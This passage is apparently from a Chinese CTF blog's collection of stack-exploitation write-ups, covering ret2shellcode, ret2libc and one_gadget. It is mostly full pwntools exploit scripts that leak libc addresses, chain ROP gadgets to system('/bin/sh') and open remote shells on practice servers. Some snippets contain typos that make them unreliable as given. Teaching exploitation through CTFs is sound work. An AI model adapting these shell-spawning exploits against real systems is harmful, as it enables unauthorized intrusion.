# flag{d6966bc5-1e31-45ed-9a7d-a7e66e04f25d}</code></pre><h2>ret2shellcode</h2><h3>others_shellcode</h3><pre><code></code></pre><h3>ciscn_2019_n_5</h3><pre><code>from pwn import *
# asm模块需要指定arch
context(arch=&#039;amd64&#039;, os=&quot;linux&quot;, log_level=&quot;debug&quot;)
elf = ELF(&#039;ciscn_2019_n_5&#039;)

r = remote(&quot;node3.buuoj.cn&quot;, 28651)
shell_code = asm(shellcraft.sh())

r.recvuntil(&quot;tell me your name\n&quot;)
r.sendline(shell_code)

payload = b&#039;a&#039;*0x28 + p64(0x601080)
r.recvuntil(&quot;What do you want to say to me?\n&quot;)
r.sendline(payload)

sleep(0.3)
r.sendline(&#039;cat flag&#039;)
r.interactive()
# flag{c38fb238-58ee-4da2-a300-6215a89cf5d7}</code></pre><h2>ret2libc</h2><blockquote><p>本文是以</p><ul><li>x64的cdecl函数调用约定（x64最常见的函数调用约定）为基础来撰写的</li><li>泄露puts函数地址为例，此外也可以泄露任何已使用过的函数（got表有数据）的地址来计算</li></ul><p>注：x32的调用规则与本文不太一致（system_address + exit_address + binsh_address + b'0'*8）</p></blockquote><h3>基本原理</h3><h4>return to libc</h4><p>通过栈溢出覆盖 eip使得程序 return to libc</p><ul><li>libc是动态链接共享库，里面有很多函数和字符串段</li><li>比如 system() puts() gets()</li><li>比如 '/bin/sh'</li></ul><p>于是乎我只要构造溢出的数据，就能使得程序自动执行</p><p><code>system(&#039;/bin/sh&#039;)</code>也就是getshell了</p><h4>libc address</h4><p>但是其中有一个很关键的问题，libc动态库的函数或者字符串有以下几个特性</p><ul><li>在程序每次运行的时候，libc库的基地址都是不一样的</li><li>但是无论如何，libc之间函数或者字符串的相对地址不变（确定libc版本的情况下）</li></ul><p>因此我们得先获得libc的基址才能实现我们的目的return to libc，而这一点，我们是通过</p><ul><li>先构造函数调用puts(elf.got['puts'])获得泄露的puts函数真实地址</li><li>然后通过LibSearcher('puts', puts_real_address)（确定libc版本确定相对地址）计算偏移值</li><li>从而得到我们想要的目标system('/bin/sh')调用所需要用到的参数</li></ul><h3>基本流程</h3><h4>所需的环境</h4><p>注意，其中的rdi;ret部分内容根据你的需求不同。</p><p>传入的参数不止一个比如，你得去找相对应的rdi,rsi,rdx,rcx,r8,r9对应的ret。</p><pre><code>from pwn import *
from LibcSearcher import *

p = remote(&#039;node3.buuoj.cn&#039;, 27417)
context(os=&#039;linux&#039;, arch=&#039;amd64&#039;, log_level=&#039;debug&#039;)
elf = ELF(&#039;ciscn_2019_c_1&#039;)
# rdi;ret: p64(0x400c83)
# ret:     p64(0x4006b9)</code></pre><h4>构造地址泄露</h4><p>对于x64 liunx，通过栈溢出实现，调用puts实现泄露puts函数地址</p><ul><li>call-》plt-》got-》实际在内存中的地址</li><li>plt表和got表是固定的，在plt文件内可以找到，内存地址不固定</li><li>plt表：调用需要使用plt表的值</li><li>got表：用于获取函数实际在内存中的地址</li></ul><blockquote><pre><code># 用来读取plt和got表
elf = ELF(&#039;test_c_1&#039;)

# ×64程序基本都存在的一个地址[pop rdi;ret]
pop_rdi_ret = p64(0x400c83)
# 执行结束后返回到main函数地址（以防止栈结构被破坏）
payload  = offset
# 即使用puts_plt表嗲用puts(*puts_got)==puts(puts_real_address)
payload += pop_rdi_ret + p64(elf.got[&#039;puts&#039;]) + p64(elf.plt[&#039;puts&#039;])
# 执行完后返回main
payload += p64(elf.symbols(&#039;main&#039;))</code></pre></blockquote><h4>获取libc信息</h4><p>对泄露的puts函数实际地址进行格式化，以此为参数得到libc库的信息</p><pre><code># 使用pwntools读取得到返回的地址
raw_rev = ...
puts_real_addr = u64(raw_rev.ljust(8, b&#039;\x00&#039;))

# 使用LibSearcher进行搜索得到libc的库信息
# 比如版本号，类型等
libc = LibSearcher(&#039;puts&#039;, puts_real_addr)</code></pre><h4>计算sh地址</h4><p>"/bin/sh"，system地址</p><p>计算libc的基址从而计算出注入"/bin/sh"，system函数的地址，从而实现调用system函数</p><blockquote><pre><code># puts_addr是实际运行中libc中puts的地址，与libc.dump对应的地址比较计算得到基址
libc_base   = puts_addr - libc.dump(&#039;gets&#039;) 
system_addr = libc_base + libc.dump(&#039;system&#039;) 
binsh_addr  = libc_base + libc.dump(&#039;str_bin_sh&#039;)</code></pre></blockquote><h4>调用shell</h4><p>对于x64 liunx，调用system的标准压栈顺序：</p><blockquote><pre><code># ×64程序基本都存在的一个地址[pop rdi;ret]
pop_rdi_ret = p64(0x400c83)

# libc = LibcSearcher(&#039;puts&#039;, 0x7f3d9e3866900000)

context(os=&quot;linux&quot;, arch=&quot;amd64&quot;, log_level=&quot;debug&quot;)
elf = ELF(&quot;./bjdctf_2020_babyrop&quot;)
lib = ELF(&quot;./libc-2.23.so&quot;)
r = remote(&#039;node3.buuoj.cn&#039;, 26887)# process(&quot;./easyheap&quot;)

pop_rdi = p64(0x400733)
ret     = p64(0x4004c9)

# 64
offset  = b&#039;a&#039;*0x20 + b&#039;g&#039;*0x8
payload = offset + pop_rdi + p64(0x601018) + p64(elf.plt[&#039;puts&#039;]) + p64(elf.symbols[&#039;main&#039;])

r.sendlineafter(&#039;Pull up your sword and tell me u story!\n&#039;, payload)
raw = r.recv(6)
add = u64(raw.ljust(8, b&#039;\x00&#039;))
print(raw, raw.ljust(8, b&#039;\x00&#039;), hex(add))

# exit(0)
# libc = LibcSearcher(&#039;puts&#039;, add)
# LibcSearcher不能用
libc_base = add - lib.symbols[&#039;puts&#039;]
# ROPgadget --binary /home/poilzero/pwn/libc-2.23.so --string &quot;/bin/sh&quot;
binsh_add = libc_base + 0x18cd57
system_add= libc_base + lib.symbols[&#039;system&#039;]

payload = offset + ret + pop_rdi + p64(binsh_add) + p64(system_add)
r.sendlineafter(&#039;Pull up your sword and tell me u story!\n&#039;, payload)

sleep(0.3)
r.sendline(&#039;cat flag&#039;)
r.interactive()
# flag{93f43e9e-0ac4-40a8-8a10-bcbc76529f64}</code></pre><h3>铁人三项(第五赛区)_2018_rop</h3><pre><code>#coding=utf-8
from pwn import *
from LibcSearcher import *

context(os=&quot;linux&quot;, arch=&quot;i386&quot;, log_level=&quot;debug&quot;)
elf = ELF(&quot;./2018_rop&quot;)
r = remote(&#039;node3.buuoj.cn&#039;, 26607)# process(&quot;./easyheap&quot;)

# 32
offset  = b&#039;a&#039;*0x88 + b&#039;g&#039;*0x4
payload = offset + p32(elf.plt[&#039;write&#039;]) + p32(elf.symbols[&#039;main&#039;])
payload+= p32(1) + p32(elf.got[&#039;write&#039;]) + p32(0x4)

r.sendline(payload)
raw = r.recv(4)
add = u32(raw)
print(raw, hex(add))

libc = LibcSearcher(&#039;write&#039;, add)
libc_base = add - libc.dump(&#039;write&#039;)
system_add= libc_base + libc.dump(&#039;system&#039;)
binsh_add = libc_base + libc.dump(&#039;str_bin_sh&#039;)

payload = offset + p32(system_add) + p32(elf.symbols[&#039;m0ain&#039;]) + p32(binsh_add)
# r.sendlineafter(&#039;Hello, World\n&#039;, payload)
r.sendline(payload)

sleep(0.3)
r.sendline(&#039;cat flag&#039;)
r.interactive()</code></pre><h3>ciscn_2019_c_1</h3><blockquote>buu-pwn-ciscn_2019_c_1：<span class="external-link"><a class="no-external-link" href="https://blog.csdn.net/qq_41560595/article/details/108940662" target="_blank"><i data-feather="external-link"></i>https://blog.csdn.net/qq_41560595/article/details/108940662</a></span></blockquote><p>注册机如下</p><pre><code>&#039;&#039;&#039;
基本环境
&#039;&#039;&#039;
from pwn import *
from LibcSearcher import *

p = remote(&#039;node3.buuoj.cn&#039;, 27417)
context(os=&#039;linux&#039;, arch=&#039;amd64&#039;, log_level=&#039;debug&#039;)
elf = ELF(&#039;ciscn_2019_c_1&#039;)
# rdi;ret: p64(0x400c83)
# ret:     p64(0x4006b9)
&#039;&#039;&#039;
构造puts(*puts_got)
&#039;&#039;&#039;
# puts泄露libc-puts地址
offset = b&#039;\0&#039; + b&#039;a&#039;*(0x50 - 1 + 8)
payload  = offset + p64(0x400c83)
payload += p64(elf.got[&#039;puts&#039;]) + p64(elf.plt[&#039;puts&#039;]) + p64(elf.symbols[&#039;main&#039;])
p.sendlineafter(b&#039;Input your choice!\n&#039;, b&#039;1&#039;)
p.sendlineafter(b&#039;Input your Plaintext to be encrypted\n&#039;, payload)

&#039;&#039;&#039;
获得libc库信息
&#039;&#039;&#039;
p.recvuntil(b&#039;Ciphertext\n&#039;)
p.recvline()
raw = p.recvline()
add = u64(raw[:-1].ljust(8, b&#039;\x00&#039;))
print(raw, add)
libc = LibcSearcher(&#039;puts&#039;, add)
# exit(0)
&#039;&#039;&#039;
计算sh真实地址
&#039;&#039;&#039;
libc_base = add - libc.dump(&#039;puts&#039;)
binsh_add = libc_base + libc.dump(&#039;str_bin_sh&#039;)
system_add= libc_base + libc.dump(&#039;system&#039;)
payload = offset + p64(0x4006b9)
payload+= p64(0x400c83) + p64(binsh_add) + p64(system_add)
&#039;&#039;&#039;
调用system(&#039;/bin/sh&#039;)
&#039;&#039;&#039;
p.sendlineafter(b&#039;Input your choice!\n&#039;, b&#039;1&#039;)
p.sendlineafter(b&#039;Input your Plaintext to be encrypted\n&#039;, payload)
&#039;&#039;&#039;
cat flag!
&#039;&#039;&#039;
sleep(0.3)
p.sendline(b&#039;cat flag&#039;)
p.interactive()</code></pre><p><img src="http://poilzero.cn/usr/themes/handsome/assets/img/loading.svg" alt="image-20210308174842462" title="image-20210308174842462" style=""data-original=""></p><h3>ciscn_2019_en_2</h3><blockquote><pre><code># rdi;ret: p64(0x400c83)
# ret:     p64(0x4006b9)</code></pre></blockquote><p>这题和上一题差不多，两题写的时间间隔比较长，这一题是后来写的</p><pre><code>from pwn import *
from LibcSearcher import *
context(os=&#039;linux&#039;, arch=&#039;i386&#039;, log_level=&#039;debug&#039;)
r = remote(&#039;node3.buuoj.cn&#039;, 29206)
elf = ELF(&#039;ciscn_2019_en_2&#039;)

# 溢出值 s 0x30但是之前还有一个变量应该是临时变量，总空间占据0x50
offset  = b&#039;\0&#039; + b&#039;a&#039;*(0x50-1+8)
&#039;&#039;&#039;
step1 turn 1
get puts_real_add
&#039;&#039;&#039;
payload = &#039;1&#039;
r.sendlineafter(&#039;Input your choice!\n&#039;, payload)

# rdi;ret: p64(0x400c83)
# ret:     p64(0x4006b9)
payload = offset + p64(0x400c83) + p64(elf.got[&#039;puts&#039;]) + p64(elf.plt[&#039;puts&#039;]) + p64(elf.symbols[&#039;main&#039;])
r.sendlineafter(&#039;Input your Plaintext to be encrypted&#039;, payload)
&#039;&#039;&#039;
step2 turn 1
caculate the needed address
&#039;&#039;&#039;
r.recvuntil(b&#039;Ciphertext\n\n&#039;)
raw = r.recv(6)
# u64即可字符串地址转真地址(数字类型)，大小端转换
add = u64(raw.ljust(8, b&#039;\x00&#039;))
print(raw, hex(add))

libc = LibcSearcher(&#039;puts&#039;, add)
libc_base  = add - libc.dump(&#039;puts&#039;)
system_add = libc_base + libc.dump(&#039;system&#039;)
binsh_add  = libc_base + libc.dump(&#039;str_bin_sh&#039;)

&#039;&#039;&#039;
step3 turn 2
jump to system(&#039;/bin/sh&#039;)
&#039;&#039;&#039;
payload = &#039;1&#039;
r.sendlineafter(&#039;Input your choice!\n&#039;, payload)

# rdi;ret: p64(0x400c83)
# ret:     p64(0x4006b9)
payload = offset + p64(0x4006b9) + p64(0x400c83) + p64(binsh_add) + p64(system_add)
r.sendlineafter(&#039;Input your Plaintext to be encrypted&#039;, payload)

sleep(0.3)
r.sendline(&#039;cat flag&#039;)
r.interactive()</code></pre><h3>OGeek2019-babyrop</h3><h4>基本流程</h4><ul><li>读取文件</li><li><p>sub_804871F</p><ul><li>会输出文件内容</li><li>一个0x20u的read可以溢出</li></ul></li><li><p>sub_80487D0</p><ul><li>一个0xe7的read可以溢出</li></ul></li></ul><pre><code>int __cdecl sub_804871F(int a1)
{
  size_t v1; // eax
  char s; // [esp+Ch] [ebp-4Ch]
  char buf[7]; // [esp+2Ch] [ebp-2Ch]
  unsigned __int8 v5; // [esp+33h] [ebp-25h]
  ssize_t v6; // [esp+4Ch] [ebp-Ch]

memset(&amp;s, 0, 0x20u);
  memset(buf, 0, 0x20u);
  sprintf(&amp;s, &quot;%ld&quot;, a1);
  v6 = read(0, buf, 0x20u);
  buf[v6 - 1] = 0;
  v1 = strlen(buf);
  if ( strncmp(buf, &amp;s, v1) )
    exit(0);
  write(1, &quot;Correct\n&quot;, 8u);
  return v5;
}

ssize_t __cdecl sub_80487D0(char a1)
{
  ssize_t result; // eax
  char buf; // [esp+11h] [ebp-E7h]

if ( a1 == 127 )
    result = read(0, &amp;buf, 0xC8u);
  else
    result = read(0, &amp;buf, a1);
  return result;
}</code></pre><h4>整体思路</h4><p>本地没给system函数的got/plt表，因此得泄露某个函数地址</p><ul><li>得到libc库版本</li><li>得到libc库偏移值</li></ul><p>然后计算得到system bin_sh_add地址才行。</p><p>而本题只有一个sprintf是输出函数，而sprintf执行前在main中都有清空buffer区的代码，因此不能把某个函数真实地址写入buffer区然后读取，但是可以劫持write把地址写入文件，然后正常读取。<br><img src="http://poilzero.cn/usr/themes/handsome/assets/img/loading.svg" alt="" title="" style=""data-original="http://poilzero.sipc115.club/usr/uploads/2021/04/134887424.png"></p><p>因为是x32 cdecl调用，栈的格式为（这里用write泄露write地址）：</p><p>构造格式：</p><ul><li><p>一个指令：cmd_address：gap_：arg1</p><ul><li>后面不需要参数则不需要gap_</li></ul></li><li><p>如system('/bin/sh')+exit(0)</p><ul><li>system_address：exit_address：binsh_address：p32(0x0)</li><li>其中，exit_address是再system('/bin/sh')执行完成后返回的地址</li><li>然后程序会执行exit(0)</li></ul></li></ul><pre><code># write(1, *write_got, 4) 即写入模式，写入write真实地址，写入4个字节（32位）
# 因为要调用后返回main调用system因此返回地址为main函数地址
p32(write_plt_add):p32(main_add):p32(1):p32(write_got_add):p32(4)</code></pre><p>然后第二次执行sub_804871F的时候直接溢出使得直接调用system('/bin/sh')即可</p><p>第二次payload构造</p><pre><code>p32(system_add):p32(exit_add):p32(binsh_add):p32(0)</code></pre><p>通过泄露的write地址计算所需的地址：</p><pre><code># 使用pwntools读取得到返回的地址
raw_rev = ...
puts_addr = u64(raw_rev.ljust(8, b&#039;\x00&#039;))

# 使用LibSearcher进行搜索得到libc的库信息
# 比如版本号，类型等
libc = LibSearcher(&#039;puts&#039;, puts_addr)

# puts_addr是实际运行中libc中puts的地址，与libc.dump对应的地址比较计算得到基址
libc_base   = puts_addr - libc.symbol(&#039;gets&#039;) 
system_addr = libc_base + libc.dump(&#039;system&#039;) 
binsh_addr  = libc_base + libc.dump(&#039;str_bin_sh&#039;)</code></pre><h4>注册机</h4><p>其中有个未解开的疑点，如何使用elf读取libc并且得到字符串地址，参考上一题</p><blockquote><ul><li>LibSearcher生成的对象libc1</li><li>pwntools中的ELF生成的对象的libc2</li></ul><p>方法一：</p><p>libc1.dump('str_bin_sh')</p><p>方法二：</p><p>X无法验证：libc2.search("/bin/sh").next()</p><p>方法三：</p><p>前面都是使用pwntools或者LibSearcher，这一种是使用one_gadget指令实现</p><p>liunx下<code>one_gadget libc文件</code></p></blockquote><p>其中三种都没法用，最后在网上找的地址</p><pre><code># env
from pwn import *
from LibcSearcher import *

context(os=&quot;linux&quot;, arch=&quot;i386&quot;, log_level=&quot;debug&quot;)
r = remote(&quot;node3.buuoj.cn&quot;,26970)
elf = ELF(&#039;pwn_baby&#039;)
libc= ELF(&#039;libc-2.23.so&#039;)

binsh_offset = libc.search(&#039;/bin/sh&#039;)
# binsh_real   = int(binsh_offset,16)
print(&#039;bin_sh&#039;,binsh_offset, type(binsh_offset))
# print(libc.symbols[&#039;bin_sh&#039;])
# print(libc.symbols[&#039;str_bin_sh&#039;])

### turn 1
# 溢出覆盖v5
payload = b&#039;\x00&#039; + b&#039;a&#039;*6
payload+= b&#039;\xff&#039;
sleep(0.3)
r.sendline(payload)

# 第二个函数溢出得到write函数地址，然后返回到main重新执行一次
r.recvuntil(&#039;Correct\n&#039;)
payload = b&#039;a&#039;*(0xe7 + 4)
# payload+= p32(elf.plt[&#039;write&#039;]) + p32(elf.symbols[&#039;main&#039;]) + p32(1) + p32(elf.got[&#039;write&#039;]) + p32(4)
payload+= p32(elf.plt[&#039;write&#039;]) + p32(0x08048825) + p32(1) + p32(elf.got[&#039;write&#039;]) + p32(4)
r.sendline(payload)

### turn 2
# 格式化处理得到的write地址
write_raw_add = r.recv(4) # 四字节32位就是地址长度
write_add = u32(write_raw_add) # return int address
print(&#039;write_add&#039;, hex(write_add))
# 计算地址
# libc = LibcSearcher(&#039;write&#039;, write_add)
libc_base = write_add - libc.symbols[&#039;write&#039;]
system_add= libc_base + libc.symbols[&#039;system&#039;]
exit_add  = libc_base + libc.symbols[&#039;exit&#039;]
libc = LibcSearcher(&#039;write&#039;, write_add)
binsh_add = libc_base + 0x15902b #libc.search(&#039;/bin/sh&#039;).next()#libc.dump(&#039;str_bin_sh&#039;) #libc.search(&#039;/bin/sh&#039;).next()
# 组成payload
payload = b&#039;a&#039;*(0xe7 + 4)
payload+= p32(system_add) + p32(exit_add) + p32(binsh_add) + p32(0)

# 溢出覆盖v5
payload2 = b&#039;\x00&#039; + b&#039;a&#039;*6
payload2+= b&#039;\xff&#039;
sleep(0.3)
r.sendline(payload2)

# send
r.recvuntil(&#039;Correct\n&#039;)
r.sendline(payload)

### flag
sleep(0.3)
r.sendline(&#039;cat flag&#039;)
r.interactive()</code></pre><h3>one_gadget</h3><blockquote><span class="external-link"><a class="no-external-link" href="https://blog.csdn.net/weixin_43092232/article/details/105085880" target="_blank"><i data-feather="external-link"></i>https://blog.csdn.net/weixin_43092232/article/details/105085880</a></span></blockquote><h4>基本逻辑</h4><p>连上会送你printf的地址，而且本身也给了你libc的文件（白送）。</p><p>你只要通过这两者，算出<code>bin_sh</code>的地址输入就会给你flag了</p><p>以下是组件的介绍：</p><h4>libc</h4><blockquote><ul><li>LibSearcher生成的对象libc1</li><li>ELF生成的对象的libc2</li></ul><p>libc1.dump['puts']==libc2.symbol['puts']</p></blockquote><h4>字符串相对地址</h4><blockquote><ul><li>LibSearcher生成的对象libc1</li><li>pwntools中的ELF生成的对象的libc2</li></ul><p>方法一：</p><p>libc1.dump('str_bin_sh')</p><p>方法二：</p><p>X无法验证：libc2.search("/bin/sh").next()</p><p>方法三：</p><p>前面都是使用pwntools或者LibSearcher，这一种是使用one_gadget指令实现</p><p>liunx下<code>one_gadget libc文件</code></p></blockquote><h4>注册机</h4><pre><code>&#039;&#039;&#039;
基本环境
&#039;&#039;&#039;
from pwn import *
from LibcSearcher import *

p = remote(&#039;node3.buuoj.cn&#039;, 25683)
context(os=&#039;linux&#039;, arch=&#039;amd64&#039;, log_level=&#039;debug&#039;)
elf = ELF(&#039;one_gadget&#039;)
libc= ELF(&#039;libc-2.29.so&#039;)

&#039;&#039;&#039;
得到printf的真实地址
&#039;&#039;&#039;
p.recvuntil(b&#039;0x&#039;)
raw = p.recvline()
add = int(raw[:-1],16)
print(raw[:-1],add)
&#039;&#039;&#039;
计算bin_sh函数的地址然后会直接给你shell
&#039;&#039;&#039;
libc_base = add - libc.symbols[&#039;printf&#039;]
# libc_binsh= libc_base + libc.dump[&#039;str_bin_sh&#039;]
# libc_system=libc_base + libc.dump[&#039;system&#039;]
# one_gadget=libc.search(&#039;/bin/sh&#039;)#.next()#0x106ef8
# print(one_gadget)
# bin_sh基址可以通过one_gadget得到(最后一个)
bin_sh    = libc_base+0x106ef8
sleep(0.3)
p.sendline(str(bin_sh))
&#039;&#039;&#039;
cat flag
&#039;&#039;&#039;
p.sendline(b&#039;cat flag&#039;)
p.interactive()</code></pre>

ctf-pwn-栈漏洞合集

标准栈溢出

整数溢出

目的

基本原理如下：

bjdctf_2020_babystack2

[BJDCTF 2nd]r2t3

格式化收集漏洞

泄露栈值

修改固定地址变量

ROP总

搜索gadget

x64栈构造

x32栈构造

理论

实例

ret2shellcode

others_shellcode

ciscn_2019_n_5

ret2libc

基本原理

return to libc

libc address

基本流程

所需的环境

构造地址泄露

获取libc信息

计算sh地址

调用shell

bjdctf_2020_babyrop

铁人三项(第五赛区)_2018_rop

ciscn_2019_c_1

ciscn_2019_en_2

OGeek2019-babyrop

基本流程

整体思路

注册机

one_gadget

基本逻辑

libc

字符串相对地址

注册机

Leave a Comment Cancel reply 写下邮箱是为了同步你的头像噢

栈漏洞合集

Leave a Comment Cancel reply
写下邮箱是为了同步你的头像噢